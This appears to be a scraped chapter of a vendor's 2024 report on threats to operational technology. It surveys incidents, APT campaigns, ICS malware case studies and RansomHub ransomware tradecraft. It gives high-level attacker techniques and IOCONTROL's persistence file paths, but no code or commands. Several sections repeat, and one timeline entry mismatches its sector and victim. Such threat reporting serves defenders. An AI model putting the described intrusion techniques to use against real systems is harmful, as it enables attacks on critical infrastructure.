The Changing Threat Landscape of OT Environments
This chapter examines key threat patterns, notable incidents, and actionable steps to mitigate risks, offering a comprehensive view of the state of OT cybersecurity.
Skip to
Spill-Over Effects of IT-OT Integration
The Human Factor is Key
In today’s rapidly digitalizing world, the traditional isolation of OT systems has given way to their close integration with IT systems. While this convergence has improved operational efficiency, it has also opened new doors for attackers. Data shows that 94% of organizations encountered OT cybersecurity incidents in the past 12 months, with IT environments playing a role in 98% of these cases—68% through direct penetration attacks and 30% through collateral damage. This highlights the ‘spill-over effect,’ where breaches in IT systems expose vulnerabilities at the IT-OT boundary.
Attackers often exploit weak links in this integration, such as credential leaks or misconfigured firewall rules, to move laterally into OT environments. Phishing campaigns targeting employees (41%) and errors by staff (39%) are the dominant attack vectors, underscoring the critical role of human factors in these incidents. As OT environments become increasingly interconnected with IT systems, traditional one-size-fits-all security approaches are proving ineffective, necessitating more tailored and proactive measures.
QB1: Has your organization experienced a cyber incident in its OT (Operational Technology) environment in the past 12 months?
Figure 1.1. The Spill-Over Effect: Attacks on IT are Impacting OT
Sources of Cyber Incidents Impacting OT Environments, Total
QB1a: Regarding the cyber incidents you experienced this year, did these incidents affect OT systems through IT systems?
Yes, through penetration attacks originating in the IT environment
Yes, as a collateral impact from the IT environment
No, they were exclusively OT-targeted incidents
Uncertain
QB1: Has your organization experienced a cyber incident in its OT (Operational Technology) environment in the past 12 months?
Figure 1.1. The Spill-Over Effect: Attacks on IT are Impacting OT
Yes, through penetration attacks originating in the IT environment
Yes, as a collateral impact from the IT environment
No, they were exclusively OT-targeted incidents
Uncertain
QB1a: Regarding the cyber incidents you experienced this year, did these incidents affect OT systems through IT systems?
Sources of Cyber Incidents Impacting OT Environments, Total
QB1b: Which of the following OT security incidents have you encountered in your organization in the past 12 months?
Figure 1.2. OT Security Incidents Experienced in the Past 12 Months
Ongoing Geopolitical Risks for Critical Infrastructure
Critical infrastructure faces persistent risks, exacerbated by geopolitical tensions. During periods of strained international relations, these facilities are frequently targeted by nation-state attackers who aim to disrupt operations for the sake of gaining political and military advantages. This emphasizes OT systems’ vulnerabilities in the context of hybrid warfare. Based on the TXOne Threat Research Team’s 2024 analysis of APT group attack landscapes, several key threat patterns have been identified.
APT Groups Targeting Exposed OT Devices on the Internet
From October 2023 to June 2024, multiple attacks targeted OT devices exposed to the internet within the U.S. water and wastewater systems (WWS) sector. According to CISA investigations, these cyberattacks were carried out by groups linked to the Iranian Islamic Revolutionary Guard Corps (IRGC), specifically CyberAv3ngers (tracked by Microsoft as Storm-0784) and pro-Russian hacker organizations.1
Recent research2 also revealed that the CyberAv3ngers threat group utilized IOCONTROL malware to target IoT and OT devices in the U.S. and Israel, including Programmable Logic Controllers (PLCs), Human Machine Interfaces (HMIs), IP cameras, perimeter devices, and Linux-based IoT/OT platforms. Through reverse engineering, it was discovered that IOCONTROL is one of the few malware strains targeting Linux-based ICS systems.
Notably, IOCONTROL employs Message Queuing Telemetry Transport (MQTT), a protocol commonly used in industrial IoT, for command-and-control (C2) communications. Furthermore, its MQTT communications are SSL-encrypted, making it challenging for standard network devices to detect these malicious activities and leaving victims largely unaware of infection. These incidents amply demonstrate the vulnerabilities of OT systems as weak points in escalating geopolitical conflicts.
Linux-based Malware:
Backdoors and Persistence
Satellite Network Attacks: Emerging Risks for OT Environments
Modern warfare increasingly relies on satellite technology to control drones and facilitate network communications, prompting threat actors to develop tactics such as denial-of-service (DoS) attacks or hijacking techniques against satellites. For example, conflict zones like the Black Sea and the Mediterranean Sea have faced widespread satellite network interference throughout 20243, disrupting OT environments reliant on satellite technology. This trend has been observed in instances such as widespread GPS jamming in war zones, where interference caused ships to appear to be located at airports due to navigational errors.4
Our research indicates that these types of attacks do not require significant financial resources. Adversaries can execute satellite hijacking attacks with equipment costing as little as $300, utilizing simple receivers and modulators. Despite this vulnerability, the cost-efficiency of Low Earth Orbit (LEO) satellites continues to drive their adoption in critical infrastructure. Further, many manufacturers now offer solutions that enable OT environment devices to connect directly to remote systems via satellite networks.
The lack of a universal solution to prevent satellite network attacks poses a significant risk in general-use environments. Attackers could potentially gain direct control over operational control systems or even take over entire OT environments. This emerging vulnerability highlights the urgent need for protective measures and the development of resilient satellite communication protocols to safeguard critical OT systems.
Adversaries can execute satellite hijacking attacks with equipment costing as little as
January
⬤ ICS Supplier
Sector
Manufacturing
Victim
Schneider Electric
⬤
Sector
Manufacturing
Victim
Schneider Electric
⬤
Sector
Semiconductor
Victim
Foxsemicon
⬤ ICS Malware
Sector
Electricity & Utilities
Victim
Ukrainian Energy Distributor
February
⬤ BlackCat
Sector
Pharmaceutical & Healthcare
Victim
Change Healthcare
⬤
Sector
Manufacturing
Victim
Battery Maker Varta
⬤
Sector
Manufacturing
Victim
Thyssenkrupp
March
⬤
Sector
Pharmaceutical & Healthcare
Victim
Crinetics Pharmaceuticals
⬤
Sector
Automotive
Victim
Nissan Oceania
⬤ Indirect Factors
Sector
Public Transportation
Victim
Liverpool Airport
April
⬤ APT War
Sector
OT
Victim
Black Sea & Mediterranean Sea
⬤ Target ICS
Sector
Water
Victim
Russian Wastewater
May
⬤ Ransomhub
Sector
Food & Beverage
Victim
Crinetics Pharmaceuticals
June-July
⬤
Sector
Pharmaceutical & Healthcare
Victim
U.S. Healthcare Providers
⬤
Sector
Pharmaceutical & Healthcare
Victim
Major Hospitals in London
⬤ Indirect Factors
Sector
Water
Victim
U.S. Water and
Wastewater Systems
August
⬤
Sector
Semiconductor
Victim
Microchip Technology
⬤
Sector
Public Transportation
Victim
Seattle Airport
September
⬤
Sector
Pharmaceutical & Healthcare
Victim
UMC Health System
⬤
Sector
Water
Victim
Arkansas Water Treatment
October-December
⬤
Sector
Water
Victim
American Water
⬤
Sector
Oil & Gas
Victim
Costa Rica’s State Oil Refinery
⬤ ICS Malware
Sector
OT
Victim
OT Devices in the U.S. and Israel
Exploiting Supply Chains and Vulnerabilities
Supply chain attacks have emerged as a major cybersecurity threat vector in recent years. 37% of organizations said that attackers exploit software vulnerabilities to infiltrate target systems. Once a single link in the supply chain is compromised, the security of the entire system is endangered.
Vulnerabilities in Remote Access Solutions
In early 2024, five zero-day vulnerabilities were disclosed in a well-known remote access solution,5 some of which were actively exploited for unauthorized remote code execution (RCE) and weaponized by nation-state actors. Despite the vendor’s collaboration with regulatory bodies to issue patches, each patch cycle attracted more attackers attempting new angles of exploitation. This case illustrates the precipitous race between patching speed and attack execution in the supply chain and serves as a reminder for organizations to apply patches promptly while implementing layered defenses to counter increasingly sophisticated attack methods.6
North Korean Threat Actor Exploits Supply Chain Vulnerabilities and Deploys Custom RAT
In July 2024, the U.S. Department of Justice indicted an individual linked to North Korean threat actor Onyx Sleet. Onyx Sleet’s operations demonstrated new forms of attacks by exploiting initial access vulnerabilities, such as Log4j and several N-day vulnerabilities, followed by the implantation of a custom remote access trojan (RAT) identified by Kaspersky as Dtrack,7 which was observed in global attacks from September 2019 to January 2024. They successfully targeted multiple entities in India, South Korea, and the United States, including defense and energy sectors, engaging in persistent infiltration activities. These incidents highlight the increasing sophistication of attackers leveraging vulnerabilities.8
Perimeter Device Vulnerabilities Exploited to Infiltrate Critical Infrastructure Networks
In 2024, China’s APT groups escalated their cyber operations, targeting critical infrastructure and OT systems to disrupt U.S. capabilities.9 Volt Typhoon, first identified in 2023, expanded its botnet infrastructure to exploit small office/home office (SOHO) and End-of-Life (EOL) devices within the critical infrastructure sector.10 Similarly, Flax Typhoon, operating under the Chinese entity Integrity Technology Group, deployed a massive botnet known as Raptor Train, comprising over 200,000 compromised devices. Leveraging vulnerabilities across over 20 device brands, including routers, IP cameras, and NAS servers, they deployed Nosedive malware, enabling remote command execution and Distributed Denial of Service (DDoS) attacks.11 12
Figure 1.4. Threat Actors Exploited Firewall Vulnerabilities to Attack Denmark’s Remote OT Environments
As perimeter devices are relatively accessible to external attackers, they have become prime targets for nation-state APT groups. These vulnerabilities leave organizations—regardless of size or location—susceptible to random penetration tests by attackers, leading to OT network infiltration. For example, in late 2023, Danish power grid operators, relying on the same brand of firewalls as OT network buffers, became victims of large-scale APT attacks exploiting that year’s firewall vulnerabilities.13 The attackers successfully gained control over sections of the grid.
In December 2024, the U.S. government accused Chinese hackers of exploiting tens of thousands of global firewall devices and developing zero-day vulnerabilities.14 Within a month of the vulnerability’s disclosure, attempts to breach Danish critical infrastructure surged dramatically.15 These incidents highlight the urgent need for critical infrastructure and manufacturing sectors to proactively address perimeter device vulnerabilities.
Emerging Industrial Control System Malware
A significant new threat to critical infrastructure is the emergence of ICS malware such as Fuxnet and FrostyGoop, both designed specifically for OT environments and believed to have geopolitical connections.
Case Study 1
Fuxnet ICS Malware
Fuxnet, linked to the Blackjack hacking group (allegedly tied to Ukrainian security agencies), was implicated in a major attack against Moscollector, a Moscow-based company managing water supply, wastewater treatment, and communication systems.16 17 Using malware similar to Stuxnet, Fuxnet disabled industrial sensors and disrupted operations across multiple sectors. The malware specifically targeted sensor gateways utilizing serial bus protocols like RS485 and Meter-Bus rather than the sensors themselves.
It began by deleting critical files and directories, shutting down remote access services, and corrupting routing table information. It then damaged file systems, reprogrammed device firmware, and physically destroyed NAND storage chips. Most critically, Fuxnet sent random data to connected sensor gateways, overloading communication channels and effectively disabling the sensors.18
Case Study 2
FrostyGoop ICS Malware
FrostyGoop, another geopolitically motivated OT malware, was used in a cyberattack on a municipal energy company in Ukraine, disrupting heating services to over 600 apartment buildings for two days.19 This malware specifically targeted control systems using the Modbus TCP protocol, a common industrial standard. The attackers gained initial access through external routers, exfiltrating user credentials from the victim’s network. Exploiting weak network segmentation, they established secondary tunnels to penetrate the OT network.
Uniquely, FrostyGoop avoided deploying malware onto targeted network assets, thereby reducing the risk of detection, analysis, and forensic investigation. Instead, it relied on remote access to directly send unauthorized Modbus TCP commands to ENCO controllers managing the heating systems, causing system failures and inaccurate measurements. This technique bypasses host-based detection and prevention defenses, making it particularly challenging to counter. FrostyGoop poses a significant threat to global ICS sectors, including energy, water and wastewater management, manufacturing, transportation, and oil and gas industries.20
Case Study 3
Chaya_003
Researchers identified three binary files, labeled as Chaya_003, designed to terminate Siemens TIA Portal processes running on engineering workstations, as well as other related processes.21 Through their analysis, it was revealed that attackers utilized Discord webhooks as part of their command-and-control (C2) infrastructure. This approach combines system reconnaissance with process disruption. Discord webhooks are tools that enable automated messages and data updates to be sent to Discord servers. Regardless of whether the process termination succeeded or failed, the attackers leveraged Discord webhooks to report the status back to their servers.
Additionally, two of the binary files were named “Isass.exe” and “elsass.exe”, indicating an attempt to mimic legitimate system processes. This tactic likely aims to deceive users or bypass antivirus solutions.
Case Study 4
Ramnit Worm
Ramnit is a form of malware that emerged in 2010 as a banking trojan designed to steal user credentials and sell them on dark-net forums. Over time, Ramnit evolved into a modular platform capable of downloading various plugins from its C2 server, enabling advanced functionalities such as remote desktop control and screenshot capture.22 In 2024, two Ramnit cluster samples were identified and submitted to VirusTotal.
These malicious programs were detected in executable files of Mitsubishi GX Works software on EWS, infected with the Ramnit worm. While the exact method of entry into OT environments remains unclear, the worm is suspected to spread via compromised physical devices, such as USB drives, or through poorly segmented network infrastructures, posing a significant threat to OT systems.23
Case Study 5
IOCONTROL
In the previous section, we discussed that IOCONTROL malware is particularly notable as one of the few targeting Linux-based ICS systems. CyberAv3ngers group used IOCONTROL malware to attack IoT and OT devices in the U.S. and Israel, including PLCs, HMIs, IP cameras, and Linux-based platforms. IOCONTROL, targeting Linux-based ICS systems, installs a backdoor at /usr/bin/iocontrol with a persistence script at /etc/rc3.d/S93InitSystemd.sh. It leverages SSL-encrypted MQTT communications for C2, making detection difficult. These attacks highlight the vulnerabilities of OT systems amid rising geopolitical tensions.
Case Study 1
Fuxnet ICS Malware
Fuxnet, linked to the Blackjack hacking group (allegedly tied to Ukrainian security agencies), was implicated in a major attack against Moscollector, a Moscow-based company managing water supply, wastewater treatment, and communication systems.16 17 Using malware similar to Stuxnet, Fuxnet disabled industrial sensors and disrupted operations across multiple sectors. The malware specifically targeted sensor gateways utilizing serial bus protocols like RS485 and Meter-Bus rather than the sensors themselves.
It began by deleting critical files and directories, shutting down remote access services, and corrupting routing table information. It then damaged file systems, reprogrammed device firmware, and physically destroyed NAND storage chips. Most critically, Fuxnet sent random data to connected sensor gateways, overloading communication channels and effectively disabling the sensors.18
Case Study 2
FrostyGoop ICS Malware
FrostyGoop, another geopolitically motivated OT malware, was used in a cyberattack on a municipal energy company in Ukraine, disrupting heating services to over 600 apartment buildings for two days.19 This malware specifically targeted control systems using the Modbus TCP protocol, a common industrial standard. The attackers gained initial access through external routers, exfiltrating user credentials from the victim’s network. Exploiting weak network segmentation, they established secondary tunnels to penetrate the OT network.
Uniquely, FrostyGoop avoided deploying malware onto targeted network assets, thereby reducing the risk of detection, analysis, and forensic investigation. Instead, it relied on remote access to directly send unauthorized Modbus TCP commands to ENCO controllers managing the heating systems, causing system failures and inaccurate measurements. This technique bypasses host-based detection and prevention defenses, making it particularly challenging to counter. FrostyGoop poses a significant threat to global ICS sectors, including energy, water and wastewater management, manufacturing, transportation, and oil and gas industries.20
Case Study 3
Chaya_003
Researchers identified three binary files, labeled as Chaya_003, designed to terminate Siemens TIA Portal processes running on engineering workstations, as well as other related processes.21 Through their analysis, it was revealed that attackers utilized Discord webhooks as part of their command-and-control (C2) infrastructure. This approach combines system reconnaissance with process disruption. Discord webhooks are tools that enable automated messages and data updates to be sent to Discord servers. Regardless of whether the process termination succeeded or failed, the attackers leveraged Discord webhooks to report the status back to their servers.
Additionally, two of the binary files were named “Isass.exe” and “elsass.exe”, indicating an attempt to mimic legitimate system processes. This tactic likely aims to deceive users or bypass antivirus solutions.
Case Study 4
Ramnit Worm
Ramnit is a form of malware that emerged in 2010 as a banking trojan designed to steal user credentials and sell them on dark-net forums. Over time, Ramnit evolved into a modular platform capable of downloading various plugins from its C2 server, enabling advanced functionalities such as remote desktop control and screenshot capture.22 In 2024, two Ramnit cluster samples were identified and submitted to VirusTotal.
These malicious programs were detected in executable files of Mitsubishi GX Works software on EWS, infected with the Ramnit worm. While the exact method of entry into OT environments remains unclear, the worm is suspected to spread via compromised physical devices, such as USB drives, or through poorly segmented network infrastructures, posing a significant threat to OT systems.23
Case Study 5
IOCONTROL
In the previous section, we discussed that IOCONTROL malware is particularly notable as one of the few targeting Linux-based ICS systems. CyberAv3ngers group used IOCONTROL malware to attack IoT and OT devices in the U.S. and Israel, including PLCs, HMIs, IP cameras, and Linux-based platforms. IOCONTROL, targeting Linux-based ICS systems, installs a backdoor at /usr/bin/iocontrol with a persistence script at /etc/rc3.d/S93InitSystemd.sh. It leverages SSL-encrypted MQTT communications for C2, making detection difficult. These attacks highlight the vulnerabilities of OT systems amid rising geopolitical tensions.
Ransomware
The Need for Ongoing Vigilance
From the perspective of ransomware victims, the growth rate of reported cases in 2024 has slowed. However, ransomware continues to pose a significant threat to national security, public safety, and economic prosperity.
Observing trends from 2024 to date, ransomware attacks targeting the pharmaceutical and healthcare sectors remain disproportionately high, followed by manufacturing and industrial manufacturing services, ranked second and third, respectively.
Note: These statistics are derived from self-reports by ransomware groups, which might not always correlate precisely with actual incidents.
Figure 1.5. Number of Victims Affected by Ransomware Attacks from 2022-2024
Click to read more
Notably, some ransomware groups have demonstrated the ability to recover swiftly from takedowns by law enforcement and launch retaliatory actions. For example, BlackCat, despite being dismantled by the FBI, resumed operations within a day, continuing to threaten hospitals and nuclear power plants with barely any disruption. In 2024, the group targeted a major U.S. healthcare institution.24 Even after the victim paid a $22 million ransom, system restoration remained challenging, necessitating intervention from the White House and Congress.
Similarly, when LockBit’s dark web extortion site was infiltrated by law enforcement in 2024, the group quickly recovered and vowed to launch retaliatory attacks on one million companies worldwide. Ransomware groups continue to evolve their tactics to bypass defenses and escalate their impact, making them increasingly difficult to neutralize. Their resilience and adaptability underscore the urgent need for enhanced cybersecurity measures across all sectors.
Notably, some ransomware groups have demonstrated the ability to recover swiftly from takedowns by law enforcement and launch retaliatory actions. For example, BlackCat, despite being dismantled by the FBI, resumed operations within a day, continuing to threaten hospitals and nuclear power plants with barely any disruption. In 2024, the group targeted a major U.S. healthcare institution.24 Even after the victim paid a $22 million ransom, system restoration remained challenging, necessitating intervention from the White House and Congress.
Similarly, when LockBit’s dark web extortion site was infiltrated by law enforcement in 2024, the group quickly recovered and vowed to launch retaliatory attacks on one million companies worldwide. Ransomware groups continue to evolve their tactics to bypass defenses and escalate their impact, making them increasingly difficult to neutralize. Their resilience and adaptability underscore the urgent need for enhanced cybersecurity measures across all sectors.
Key Ransomware Trends in 2024
In addition, we have observed the rapid rise of the RansomHub ransomware organization in February 2024. Operating under the Ransomware-as-a-Service (RaaS) model, it has quickly become one of the most active ransomware groups. Notably, its recent focus on Supervisory Control and Data Acquisition (SCADA) systems highlights the growing threat of ransomware to critical infrastructure and OT environments.25 26 Key characteristics of RansomHub include the following:
Leveraging Initial Access Brokers (IAB)
RansomHub purchases vulnerabilities or credentials from IABs to provide access to target organizational networks to enhance attack efficiency. Observed methods for obtaining initial access include phishing emails, spear-phishing attacks, exploiting vulnerabilities, and password spraying. These resources are also acquired through IABs. For instance, RansomHub has been noted to use tools like EDRKillShifter to disable EDR and antivirus software. Reports, such as findings from the Internet Crime Complaint Center (IC3), indicate the exploitation of known CVEs like Zerologon and Citrix ADC.27 28
Disabling Antivirus and Shadow Copy Services
Once inside a victim’s system, RansomHub deploys EDRKillShifter, a Bring Your Own Vulnerable Driver (BYOVD) tool, to decrypt and load vulnerable legitimate drivers. This tactic successfully disables antivirus software and deletes shadow copies, making recovery more difficult for the victim organization. The malware also deletes related event logs, complicating forensic investigations.
Utilizing LSASS Dumps and Domain Credential Dumps for Lateral Movement
After disabling antivirus software, RansomHub elevates privileges by registering new accounts or reactivating disabled accounts in the registry. It extracts LSASS dumps from compromised computers and uses tools like Netscan to identify additional targets for lateral movement. Common techniques include Remote Desktop Protocol (RDP), PsExec, and Cobalt Strike.
Data Theft for Double Extortion
RansomHub employs tools like Rclone, PuTTY, WinSCP, and Cobalt Strike to exfiltrate data to its servers. Interestingly, the ransomware deployed by RansomHub does not inherently include data exfiltration capabilities. Instead, this step occurs only after successfully infiltrating, disabling antivirus defenses, and escalating privileges. Following data theft, encryption begins, accompanied by ransom demands.
Figure 1.9. Top 20 Ransomware Groups in 2024
Note: These statistics are derived from self-reports by ransomware groups, which might not always correlate precisely with actual incidents
